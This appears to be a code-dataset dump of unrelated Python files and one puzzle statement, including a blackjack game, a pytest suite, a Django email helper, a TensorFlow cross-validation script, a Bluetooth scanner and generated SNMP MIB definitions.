    afford the doubled bet or has already doubled down; True otherwise.

    NOTE(review): the instructions say doubling down means one more card
    then an automatic stand, but this calls do_decision again (free
    choice) — confirm which behavior is intended.
    """
    if player.bet*2 > player.money :
        print(f'You don\'t have enough money to do that (${player.bet} * 2 = ${player.bet*2})! Choose again.');
        return False;
    elif player.did_double_down :
        print('You can double down only once! Choose a different option.');
        return False;
    player.bet *= 2;
    player.did_double_down = True;
    print(f'Bet increased to ${player.bet}!');  # fixed stray '.' after '!'
    do_decision(player, dealer, hand_index);
    return True;
def check_status(player, hand_index=0) :
    """Display the player's current hand with a typewriter effect and
    report whether the turn ended (blackjack or bust).

    Returns True when the hand is finished, False when play may continue.
    """
    done = False;
    # Build the hand display; the final card is revealed slowly below.
    hand_string = '[';
    for card in player.hand[hand_index][:-1] :
        hand_string += card.__str__() + ', ';
    print(f'Current Hand: {hand_string}', end='');
    sys.stdout.flush();
    time.sleep(0.5);
    disp_str_slow(f'{player.hand[hand_index][-1].__str__()}]', 0.05);
    time.sleep(0.5);
    if player.check_blackjack(hand_index) :
        disp_str_slow(' ==> BLACKJACK!!! ', 0.05);
        if not isinstance(player, people.Dealer) :
            disp_str_slow(f'-- {player.name} wins ${player.bet}!', 0.05);
        print('\n\n', end='');
        done = True;
        sys.stdout.flush();
        time.sleep(0.5);
    elif player.check_bust(hand_index) :
        disp_str_slow(' ==> BUST! ', 0.05);
        if not isinstance(player, people.Dealer) :
            disp_str_slow(f'-- {player.name} loses ${player.bet}!', 0.05);
        print('\n\n', end='');
        done = True;
        sys.stdout.flush();
        time.sleep(0.5);
    else :
        print();
    return done;
def play_again(players) :
    """Ask whether to play another round; returns 'y' or 'n'.

    Automatically returns 'n' when every entry in *players* is broke.
    NOTE(review): the dealer is included in the all-broke check —
    presumably Dealer.check_broke() always returns False; verify.
    """
    print();
    all_broke = True;
    for i in players :
        if not i.check_broke() : all_broke = False;
    if not all_broke :
        choice = input('Do you all want to play another round? Enter \'y\' or \'n\': ').lower();
        while choice != 'y' and choice != 'n' :
            choice = input('Enter either \'y\' or \'n\': ');
        print();
        return choice;
    else :
        print();
        return 'n';
def reset(players) :
    """Return every participant's cards to the dealer's deck and clear
    all bets for a fresh round."""
    dealer = players[-1];
    for participant in players :
        dealer.retrieve_cards(participant);
        participant.bet = 0;
def display_accounts(players) :
    """Print each non-dealer player's final balance, chips and net
    gain/loss relative to their starting bankroll."""
    for player in players[:-1] :
        change = player.money - player.initial_money;
        word = 'gain';
        if change < 0 :
            word = 'loss';
        print(f'    {player.name}: ${player.money} (Chips: {player.chips}), net {word} of ${abs(change)}\n');
        sys.stdout.flush();
        time.sleep(0.5);
def disp_str_slow(phrase, t) :
    """Write *phrase* one character at a time, flushing and sleeping *t*
    seconds after each character (typewriter effect)."""
    for ch in phrase :
        sys.stdout.write(ch);
        sys.stdout.flush();
        time.sleep(t);
def print_players(players) :
    """Print each player's string representation on its own line."""
    for entry in players :
        print(entry);
def main() :
    """Game driver: set up players and a 6-deck dealer, then loop rounds
    (reset, bets, deal two cards each, show hands, play) until the table
    declines another round; finally show each player's net result."""
    display_instructions();
    num_players = get_num_players();
    players = create_players(num_players);
    dealer = people.Dealer(Deck(6));
    players.append(dealer);
    replay_choice = 'y';
    while replay_choice == 'y' :
        reset(players);
        place_bets(players);
        # Two passes so everyone (dealer included) starts with two cards.
        for i in range(0,2) :
            deal(dealer, players);
        view_hands(players);
        cycle_decisions(players);
        replay_choice = play_again(players);
    print('------------------------------------------------------------------------------------------------\n');
    disp_str_slow('FINAL PLAYER ACCOUNTS\n\n', 0.05);
    sys.stdout.flush();
    time.sleep(0.5)
    display_accounts(players);
    sys.stdout.flush();
    time.sleep(0.2)
    print('------------------------------------------------------------------------------------------------\n');
    print('Goodbye!');
if __name__ == '__main__' :
main(); |
4,880 | 82c3419679a93c7640eae48b543aca75f5ff086d | from msl.equipment.connection import Connection
from msl.equipment.connection_demo import ConnectionDemo
from msl.equipment.record_types import EquipmentRecord
from msl.equipment.resources.picotech.picoscope.picoscope import PicoScope
from msl.equipment.resources.picotech.picoscope.channel import PicoScopeChannel
# Stub connection whose methods exist only for their docstrings.
# NOTE(review): ConnectionDemo appears to fabricate return values by parsing
# the return-type annotations in these docstrings (see the tests below), so
# the docstring text is effectively behavior — do not edit it casually.
class MyConnection(Connection):
    def __init__(self, record):
        super(MyConnection, self).__init__(record)
    def get_none1(self):
        """No return type is specified."""
        pass
    def get_none2(self, channel):
        """This function takes 1 input but returns nothing.
        Parameters
        ----------
        channel : :obj:`str`
            Some channel number
        """
        pass
    def get_bool1(self):
        """:obj:`bool`: A boolean value."""
        pass
    def get_bool2(self):
        """Returns a boolean value.
        Returns
        -------
        :obj:`bool`
            A boolean value.
        """
        pass
    def get_string1(self):
        """:obj:`str`: A string value."""
        pass
    def get_string2(self):
        """Returns a string value.
        Returns
        -------
        :obj:`str`
            A string value.
        """
        pass
    def get_bytes1(self):
        """:obj:`bytes`: A bytes value."""
        pass
    def get_bytes2(self):
        """Returns a bytes value.
        Returns
        -------
        :obj:`bytes`
            A bytes value.
        """
        pass
    def get_int1(self):
        """:obj:`int`: An integer value."""
        pass
    def get_int2(self):
        """Returns an integer value.
        Returns
        -------
        :obj:`int`
            An integer value.
        """
        pass
    def get_float1(self):
        """:obj:`float`: A floating-point value."""
        pass
    def get_float2(self):
        """Returns a floating-point value.
        Returns
        -------
        :obj:`float`
            A floating-point value.
        """
        pass
    def get_list_of_bool1(self):
        """:obj:`list` of :obj:`bool`: A list of boolean values."""
        pass
    def get_list_of_bool2(self):
        """A list of boolean values.
        Returns
        -------
        :obj:`list` of :obj:`bool`
            A list of boolean values.
        """
        pass
    def get_list_of_str1(self):
        """:obj:`list` of :obj:`str`: A list of string values."""
        pass
    def get_list_of_str2(self):
        """A list of string values.
        Returns
        -------
        :obj:`list` of :obj:`str`
            A list of string values.
        """
        pass
    def get_list_of_bytes1(self):
        """:obj:`list` of :obj:`bytes`: A list of bytes values."""
        pass
    def get_list_of_bytes2(self):
        """A list of bytes values.
        Returns
        -------
        :obj:`list` of :obj:`bytes`
            A list of bytes values.
        """
        pass
    def get_list_of_int1(self):
        """:obj:`list` of :obj:`int`: A list of integer values."""
        pass
    def get_list_of_int2(self):
        """A list of integer values.
        Returns
        -------
        :obj:`list` of :obj:`int`
            A list of integer values.
        """
        pass
    def get_list_of_float1(self):
        """:obj:`list` of :obj:`float`: A list of floating-point values."""
        pass
    def get_list_of_float2(self):
        """A list of floating-point values.
        Returns
        -------
        :obj:`list` of :obj:`float`
            A list of floating-point values.
        """
        pass
    def get_dict_of_bool1(self):
        """:obj:`dict` of :obj:`bool`: A dictionary of boolean values."""
        pass
    def get_dict_of_bool2(self):
        """A dictionary of boolean values.
        Returns
        -------
        :obj:`dict` of :obj:`bool`
            A dictionary of boolean values.
        """
        pass
    def get_dict_of_str1(self):
        """:obj:`dict` of :obj:`str`: A dictionary of string values."""
        pass
    def get_dict_of_str2(self):
        """A dictionary of string values.
        Returns
        -------
        :obj:`dict` of :obj:`str`
            A dictionary of string values.
        """
        pass
    def get_dict_of_bytes1(self):
        """:obj:`dict` of :obj:`bytes`: A dictionary of bytes values."""
        pass
    def get_dict_of_bytes2(self):
        """A dictionary of bytes values.
        Returns
        -------
        :obj:`dict` of :obj:`bytes`
            A dictionary of bytes values.
        """
        pass
    def get_dict_of_int1(self):
        """:obj:`dict` of :obj:`int`: A dictionary of integer values."""
        pass
    def get_dict_of_int2(self):
        """A dictionary of integer values.
        Returns
        -------
        :obj:`dict` of :obj:`int`
            A dictionary of integer values.
        """
        pass
    def get_dict_of_float1(self):
        """:obj:`dict` of :obj:`float`: A dictionary of floating-point values."""
        pass
    def get_dict_of_float2(self):
        """A dictionary of floating-point values.
        Returns
        -------
        :obj:`dict` of :obj:`float`
            A dictionary of floating-point values.
        """
        pass
    def get_multiple1(self):
        """Many different data types.
        Returns
        -------
        :obj:`str`
            A string value.
        :obj:`float`
            A floating-point value.
        :obj:`float`
            A floating-point value.
        :obj:`dict` of :obj:`int`
            A dictionary of integer values.
        :obj:`bytes`
            A bytes value.
        """
        pass
def test_return_type_builtin():
    """Verify ConnectionDemo fabricates a return value whose Python type
    matches each stub method's docstring annotation (builtin types)."""
    demo = ConnectionDemo(EquipmentRecord(), MyConnection)
    # No annotation -> None.
    assert demo.get_none1() is None
    assert demo.get_none2() is None
    # Scalar builtin types.
    assert isinstance(demo.get_bool1(), bool)
    assert isinstance(demo.get_bool2(), bool)
    assert isinstance(demo.get_string1(), str)
    assert isinstance(demo.get_string2(), str)
    assert isinstance(demo.get_bytes1(), bytes)
    assert isinstance(demo.get_bytes2(), bytes)
    assert isinstance(demo.get_int1(), int)
    assert isinstance(demo.get_int2(), int)
    assert isinstance(demo.get_float1(), float)
    assert isinstance(demo.get_float2(), float)
    # List-of-X annotations.
    x = demo.get_list_of_bool1()
    assert isinstance(x, list) and isinstance(x[0], bool)
    x = demo.get_list_of_bool2()
    assert isinstance(x, list) and isinstance(x[0], bool)
    x = demo.get_list_of_str1()
    assert isinstance(x, list) and isinstance(x[0], str)
    x = demo.get_list_of_str2()
    assert isinstance(x, list) and isinstance(x[0], str)
    x = demo.get_list_of_bytes1()
    assert isinstance(x, list) and isinstance(x[0], bytes)
    x = demo.get_list_of_bytes2()
    assert isinstance(x, list) and isinstance(x[0], bytes)
    x = demo.get_list_of_int1()
    assert isinstance(x, list) and isinstance(x[0], int)
    x = demo.get_list_of_int2()
    assert isinstance(x, list) and isinstance(x[0], int)
    x = demo.get_list_of_float1()
    assert isinstance(x, list) and isinstance(x[0], float)
    x = demo.get_list_of_float2()
    assert isinstance(x, list) and isinstance(x[0], float)
    # Dict-of-X annotations: the demo value lives under the 'demo' key.
    x = demo.get_dict_of_bool1()
    assert isinstance(x, dict) and isinstance(x['demo'], bool)
    x = demo.get_dict_of_bool2()
    assert isinstance(x, dict) and isinstance(x['demo'], bool)
    x = demo.get_dict_of_str1()
    assert isinstance(x, dict) and isinstance(x['demo'], str)
    x = demo.get_dict_of_str2()
    assert isinstance(x, dict) and isinstance(x['demo'], str)
    x = demo.get_dict_of_bytes1()
    assert isinstance(x, dict) and isinstance(x['demo'], bytes)
    x = demo.get_dict_of_bytes2()
    assert isinstance(x, dict) and isinstance(x['demo'], bytes)
    x = demo.get_dict_of_int1()
    assert isinstance(x, dict) and isinstance(x['demo'], int)
    x = demo.get_dict_of_int2()
    assert isinstance(x, dict) and isinstance(x['demo'], int)
    x = demo.get_dict_of_float1()
    assert isinstance(x, dict) and isinstance(x['demo'], float)
    x = demo.get_dict_of_float2()
    assert isinstance(x, dict) and isinstance(x['demo'], float)
    # Multiple annotated return values come back as a tuple-like of 5.
    x = demo.get_multiple1()
    assert len(x) == 5
    assert isinstance(x[0], str)
    assert isinstance(x[1], float)
    assert isinstance(x[2], float)
    assert isinstance(x[3], dict) and isinstance(x[3]['demo'], int)
    assert isinstance(x[4], bytes)
def test_return_type_object():
    """Non-builtin return annotations should yield the class object itself
    (wrapped in the demo dict)."""
    scope = ConnectionDemo(EquipmentRecord(), PicoScope)
    x = scope.channel()
    assert isinstance(x, dict) and x['demo'] == PicoScopeChannel
|
4,881 | 7df94c86ff837acf0f2a78fe1f99919c31bdcb9b | from .dla import get_network as get_dla
from lib.utils.tless import tless_config
_network_factory = {
'dla': get_dla
}
def get_network(cfg):
    """Build the detection network named by cfg.network.

    The network string may carry a layer count after an underscore
    (e.g. 'dla_34'); without one the layer count defaults to 0.
    """
    base, _, depth = cfg.network.partition('_')
    num_layers = int(depth) if depth else 0
    builder = _network_factory[base]
    return builder(num_layers, cfg.heads, cfg.head_conv,
                   tless_config.down_ratio, cfg.det_dir)
|
4,882 | 834fa5d006188da7e0378246c1a019da6fa413d2 | You are given a 2 x N board, and instructed to completely cover the board with
the following shapes:
Dominoes, or 2 x 1 rectangles.
Trominoes, or L-shapes.
For example, if N = 4, here is one possible configuration, where A is
a domino, and B and C are trominoes.
A B B C
A B C C
Given an integer N, determine the number of ways the board can be tiled using these shapes.
|
4,883 | 0349a8a4841b024afd77d20ae18810645fad41cd | from django.core.mail import send_mail
from django.template.loader import render_to_string
from django.utils.html import strip_tags
from datetime import datetime, timedelta
def sendmail(subject, template, to, context, from_email='ridham.shah.aditi@gmail.com'):
    """Render an app template and send it as a multipart (plain + HTML) email.

    Parameters
    ----------
    subject : str
        Subject line of the message.
    template : str
        Template name without extension; resolved to 'app/<template>.html'.
    to : list
        Recipient addresses, passed straight to Django's send_mail.
    context : object
        Exposed to the template as the 'data' variable.
    from_email : str, optional
        Sender address.  Parameterized (previously hard-coded) so callers
        can override it; the default preserves the original behavior.
    """
    template_str = 'app/' + template + '.html'
    html_msg = render_to_string(template_str, {'data': context})
    plain_msg = strip_tags(html_msg)
    send_mail(subject, plain_msg, from_email, to, html_message=html_msg)
4,884 | 8ad5f3e5f73eae191a3fe9bc20f73b4bfcfedc8c | #Pràctica 9 Condicionals, Exercici 2:
# Prompt for an (allegedly) even and an odd number.  Note: no parity
# validation is performed — the inputs are only compared below.
print("Introduce un valor par:")
numpar=int(input())
print("Introduce un valor impar:")
numimp=int(input())
# Report whether the first number is exactly double the second.
if numpar==numimp*2:
    print(numpar," es el doble que ",numimp,".")
else:
    print(numpar," no es el doble que ",numimp,".")
4,885 | 8039430f1b65cc76f9a78b1094f110de29f0f965 | from utils import *
from Dataset.input_pipe import *
from Learning.tf_multipath_classifier import *
def config_graph():
    """Build the multi-path network description: a shared 512-512 trunk
    ('shared1') fed by the 'organic' dataset, followed by an 11-unit
    sigmoid output head ('aspects') with its own Adam optimizer.

    Returns the list of path dicts consumed by TfMultiPathClassifier.
    """
    paths = []
    # Shared feature extractor over the 4116-dim input vectors.
    path = {}
    path['input_dim'] = 4116
    path['name'] = 'shared1'
    path['computation'] = construct_path(path['name'], [512, 512], batch_norm=False, dropout=True, dropout_rate=0.5, noise=False, noise_std=0.16)
    path['input'] = 'organic'
    paths.append(path)
    # Multi-label aspect head: 11 sigmoid outputs on top of the trunk.
    path = {}
    path['name'] = 'aspects'
    path['input'] = 'shared1'
    path['input_dim'] = 512
    path['computation'] = construct_path(path['name'], [11], batch_norm=False, activation=None)
    path['optimizer'] = tf.train.AdamOptimizer(name='optimizer', learning_rate=0.0001 , beta1=0.92 , beta2=0.9999)
    path['loss'] = loss_map('sigmoid')
    path['predictor'] = sigmoid_predictor()
    paths.append(path)
    return paths
# 10-fold cross-validation over the organic-aspects dataset: for each fold a
# fresh model is trained and evaluated, and the test F1 scores are averaged.
org_dict_full = prep_organic_aspects()
dataset_size = len(org_dict_full['train_data'])
folds = 10
fold_size= ceil(dataset_size / folds)
avg_f1 = 0
for f in range(0,folds):
    # Current fold becomes the held-out test slice.
    fold_start = f * fold_size
    fold_end = min((f+1) * fold_size, dataset_size )
    print(fold_start, fold_end)
    org_dict = fold_data_dict(org_dict_full, fold_start, fold_end )
    datasets = []
    dataset = {}
    dataset['name'] = 'organic'
    # dataset['holdout'] = 50
    dataset['batch_size'] = 10
    dataset['features'] = org_dict['train_vecs']
    dataset['type'] = tf.float32
    dataset['tasks'] = [{'name' : 'aspects', 'features' : org_dict['encoded_train_labels'], 'type': tf.float32}]
    datasets.append(dataset)
    paths = config_graph()
    params = {}
    params['train_iter'] = 4001
    model = TfMultiPathClassifier(datasets, paths, params)
    model.train()
    model.save()
    # Predictions on both splits; train metrics are printed for reference,
    # only the test F1 contributes to the average.
    y = model.get_prediciton('aspects', org_dict['test_vecs'])
    x = model.get_prediciton('aspects', org_dict['train_vecs'])
    multi_label_metrics(x, org_dict['train_labels'], org_dict['encoded_train_labels'],
                        org_dict['labeling'], org_dict['train_data'] )
    _, f1 = multi_label_metrics(y, org_dict['test_labels'], org_dict['encoded_test_labels'],
                                org_dict['labeling'], org_dict['test_data'], mute=True )
    avg_f1 +=f1
avg_f1 = avg_f1 / folds
print('\n--------------------------------------------------------------------------\nAverage F1 score:', avg_f1)
4,886 | 364150d6f37329c43bead0d18da90f0f6ce9cd1b | #coding=utf-8
import yaml
import os
import os.path
import shutil
import json
import subprocess
import sys
sys.path.append(os.path.split(os.path.realpath(__file__))[0])
import rtool.taskplugin.plugin.MultiProcessRunner as MultiProcessRunner
import rtool.utils as utils
logger = utils.getLogger('CopyRes')
def run():
    """Plugin entry point without configs; only records the invocation."""
    logger.debug("CopyRes")
def run_with_configs(configs,tp=None):
    """Run the copy action for *configs*; *tp* (task plugin) is accepted
    for interface compatibility but unused."""
    logger.debug("Executing NCopyRes")
    CopyResAction().go(configs)
def safeRemoveDir(dir_path):
    """Recursively delete *dir_path* if it exists; silently do nothing
    otherwise."""
    if not os.path.exists(dir_path):
        return
    shutil.rmtree(dir_path)
def clean_output(configs):
    """Delete the configured output root directory ('output-root') when
    present."""
    safeRemoveDir(configs["output-root"])
class CopyResAction:
    """Copy resources straight to the destination directory according to
    the resource configuration file.

    NOTE(review): in every copy branch of go(), dest_dir is computed from
    outputroot/config-root and then immediately overwritten with
    config['output-root'] unless options['dst'] is set — confirm whether
    the structure-preserving path was meant to be kept.
    """
    default_option = None
    res_root = None
    packing_root = None
    ignore_list=[]
    def setResRoot(self,root):
        # Root of the source resources.
        self.res_root = root
        pass
    def setPackingRoot(self,root):
        # Root of the packing output.
        self.packing_root = root
        pass
    def setDefaultOption(self,option):
        self.default_option = option
        pass
    def go(self,config):
        # Copy either every input file (options['cpall']) or only those
        # matching options['cpextlist'] extensions / options['filenames'].
        ext_list = []
        input_list = config['input']
        if not config['options']['cpall']:
            if 'cpextlist' in config['options']:
                ext_list = config['options']['cpextlist'].split(',')
            for input_file_path in input_list:
                basedir,filename = os.path.split(input_file_path)
                name,fext = os.path.splitext(filename)
                for ext in ext_list:
                    if ext == fext:
                        # Preserve the directory structure relative to the
                        # configuration root directory.
                        input_file_dir = os.path.dirname(input_file_path)
                        dest_dir = os.path.join(config['outputroot'],os.path.relpath(input_file_dir,config['config-root']))
                        dest_dir = config['output-root']
                        # d_dir = config['output']
                        if 'dst' in config['options']:
                            d_dir = config['options']['dst']
                            dest_dir = os.path.join(config['outputroot'],d_dir,os.path.relpath(input_file_dir,config['config-root']))
                        if not os.path.exists(dest_dir):
                            os.makedirs(dest_dir)
                        logger.debug("[CopyRes]copy "+input_file_path+" to "+dest_dir)
                        shutil.copy2(input_file_path,dest_dir)
            if 'filenames' in config['options']:
                filenames_list = config['options']['filenames'].split(',')
                for filename in filenames_list:
                    for input_file_path in input_list:
                        dirname,input_file_name = os.path.split(input_file_path)
                        if filename==input_file_name:
                            # Preserve the directory structure relative to
                            # the configuration root directory.
                            input_file_dir = os.path.dirname(input_file_path)
                            dest_dir = os.path.join(config['outputroot'],os.path.relpath(input_file_dir,config['config-root']))
                            dest_dir = config['output-root']
                            # d_dir = config['output']
                            if 'dst' in config['options']:
                                d_dir = config['options']['dst']
                                dest_dir = os.path.join(config['outputroot'],d_dir,os.path.relpath(input_file_dir,config['config-root']))
                            if not os.path.exists(dest_dir):
                                os.makedirs(dest_dir)
                            logger.debug("[CopyRes]copy "+input_file_path+" to "+dest_dir)
                            shutil.copy2(input_file_path,dest_dir)
        else:
            for input_file_path in input_list:
                # Preserve the directory structure relative to the
                # configuration root directory.
                input_file_dir = os.path.dirname(input_file_path)
                dest_dir = os.path.join(config['outputroot'],os.path.relpath(input_file_dir,config['config-root']))
                dest_dir = config['output-root']
                # d_dir = config['output']
                if 'dst' in config['options']:
                    d_dir = config['options']['dst']
                    dest_dir = os.path.join(config['outputroot'],d_dir,os.path.relpath(input_file_dir,config['config-root']))
                if not os.path.exists(dest_dir):
                    os.makedirs(dest_dir)
                logger.debug("[CopyRes]copy "+input_file_path+" to "+dest_dir)
                shutil.copy2(input_file_path,dest_dir)
            pass
        pass
4,887 | ce365e011d8cc88d9aa6b4df18ea3f4e70d48f5c | #https://codecombat.com/play/level/village-champion
# Incoming munchkins! Defend the town!
# Define your own function to fight the enemy!
# In the function, find an enemy, then cleave or attack it.
def attttaaaaacccckkkk():
    """Attack the nearest enemy: cleave when the ability is ready,
    otherwise perform a normal attack.  No-op when no enemy is visible."""
    enemy = hero.findNearest(hero.findEnemies())
    if enemy:
        # The original re-tested `enemy` inside this branch; that second
        # check was redundant and has been removed (dead commented-out
        # lookup removed as well).
        if hero.isReady('cleave'):
            hero.cleave(enemy)
        else:
            hero.attack(enemy)
# Move between patrol points and call the function.
# Patrol loop: walk the three waypoints forever, attacking at each stop.
while True:
    hero.moveXY(35, 34)
    # Use whatever function name you defined above.
    attttaaaaacccckkkk()
    hero.moveXY(47, 27)
    # Call the function again.
    attttaaaaacccckkkk()
    hero.moveXY(60, 31)
    # Call the function again.
    attttaaaaacccckkkk()
|
4,888 | 480e636cfe28f2509d8ecf1e6e89924e994f100d | #!/usr/bin/env python3
import gatt
class AnyDevice(gatt.Device):
    """gatt.Device subclass that logs connect/disconnect events and dumps
    every resolved service and characteristic to stdout."""

    def connect_succeeded(self):
        super().connect_succeeded()
        print(f"[{self.mac_address}] Connected")

    def connect_failed(self, error):
        super().connect_failed(error)
        print(f"[{self.mac_address}] Connection failed: {str(error)}")

    def disconnect_succeeded(self):
        super().disconnect_succeeded()
        print(f"[{self.mac_address}] Disconnected")

    def services_resolved(self):
        super().services_resolved()
        print(f"[{self.mac_address}] Resolved services")
        for service in self.services:
            print(f"[{self.mac_address}] Service [{service.uuid}]")
            for characteristic in service.characteristics:
                print(f"[{self.mac_address}] Characteristic [{characteristic.uuid}]")
                print(dir(characteristic))
                print("*****")
class AnyDeviceManager(gatt.DeviceManager):
    """Device manager that scans until a device whose alias contains both
    'powertap' and 'L' is discovered, prints its MAC address, then stops.

    mac_list is stored for callers but not otherwise used here.
    """
    def __init__(self, adapter_name, mac_list):
        super().__init__(adapter_name)
        self.mac_list = mac_list

    def device_discovered(self, device):
        #print("Discovered [%s] %s" % (device.mac_address, device.alias()))
        if ('powertap' in device.alias() and 'L' in device.alias()):
            print(device.mac_address)
            # Fixed: stop this manager instance instead of the module-level
            # global `manager`, which made the class unusable under any
            # other variable name.
            self.stop()
# Scan on the first Bluetooth adapter; run() blocks in the event loop until
# the manager stops itself after finding the target device.
manager = AnyDeviceManager(adapter_name='hci0',mac_list=[])
manager.start_discovery()
manager.run()
#74:5c:4b:0b:4e:f2
#device = AnyDevice(mac_address='66:12:d1:56:6b:3c', manager=manager)
4,889 | 202670314ad28685aaa296dce4b5094daab3f47a | #
# PySNMP MIB module Nortel-MsCarrier-MscPassport-AtmEbrMIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/Nortel-MsCarrier-MscPassport-AtmEbrMIB
# Produced by pysmi-0.3.4 at Mon Apr 29 20:19:41 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, ObjectIdentifier, OctetString = mibBuilder.importSymbols("ASN1", "Integer", "ObjectIdentifier", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, SingleValueConstraint, ValueSizeConstraint, ConstraintsUnion, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "SingleValueConstraint", "ValueSizeConstraint", "ConstraintsUnion", "ConstraintsIntersection")
mscAtmIfIndex, mscAtmIfVptIndex, mscAtmIfVcc, mscAtmIfVptVccIndex, mscAtmIfVpc, mscAtmIfVptVcc, mscAtmIfVccIndex, mscAtmIfVpcIndex = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex", "mscAtmIfVptIndex", "mscAtmIfVcc", "mscAtmIfVptVccIndex", "mscAtmIfVpc", "mscAtmIfVptVcc", "mscAtmIfVccIndex", "mscAtmIfVpcIndex")
mscAtmIfIisp, mscAtmIfVptIisp, mscAtmIfVptIispIndex, mscAtmIfIispIndex = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-AtmIispMIB", "mscAtmIfIisp", "mscAtmIfVptIisp", "mscAtmIfVptIispIndex", "mscAtmIfIispIndex")
mscAtmIfVpcSrc, mscAtmIfVptVccSrcIndex, mscAtmIfVccSrcIndex, mscAtmIfVptVccSrc, mscAtmIfVpcSrcIndex, mscAtmIfVccSrc = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-AtmNetworkingMIB", "mscAtmIfVpcSrc", "mscAtmIfVptVccSrcIndex", "mscAtmIfVccSrcIndex", "mscAtmIfVptVccSrc", "mscAtmIfVpcSrcIndex", "mscAtmIfVccSrc")
mscAtmIfVptPnniIndex, mscAtmIfPnniIndex, mscAtmIfPnni, mscAtmIfVptPnni = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-AtmPnniMIB", "mscAtmIfVptPnniIndex", "mscAtmIfPnniIndex", "mscAtmIfPnni", "mscAtmIfVptPnni")
mscAtmIfVptUni, mscAtmIfUni, mscAtmIfUniIndex, mscAtmIfVptUniIndex = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-AtmUniMIB", "mscAtmIfVptUni", "mscAtmIfUni", "mscAtmIfUniIndex", "mscAtmIfVptUniIndex")
Counter32, DisplayString, Gauge32, StorageType, RowStatus = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-StandardTextualConventionsMIB", "Counter32", "DisplayString", "Gauge32", "StorageType", "RowStatus")
NonReplicated, = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-TextualConventionsMIB", "NonReplicated")
mscPassportMIBs, = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-UsefulDefinitionsMIB", "mscPassportMIBs")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
Integer32, ObjectIdentity, ModuleIdentity, Bits, Counter32, IpAddress, Gauge32, NotificationType, iso, MibScalar, MibTable, MibTableRow, MibTableColumn, MibIdentifier, Unsigned32, Counter64, TimeTicks = mibBuilder.importSymbols("SNMPv2-SMI", "Integer32", "ObjectIdentity", "ModuleIdentity", "Bits", "Counter32", "IpAddress", "Gauge32", "NotificationType", "iso", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "MibIdentifier", "Unsigned32", "Counter64", "TimeTicks")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
atmEbrMIB = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159))
mscAtmIfVpcSrcEbrOv = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2))
mscAtmIfVpcSrcEbrOvRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 1), )
if mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvRowStatusTable.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVpcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmNetworkingMIB", "mscAtmIfVpcSrcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVpcSrcEbrOvIndex"))
if mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvRowStatusEntry.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 1, 1, 1), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvRowStatus.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvComponentName.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvStorageType.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvIndex.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 20), )
if mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvProvTable.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 20, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVpcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmNetworkingMIB", "mscAtmIfVpcSrcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVpcSrcEbrOvIndex"))
if mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvProvEntry.setStatus('mandatory')
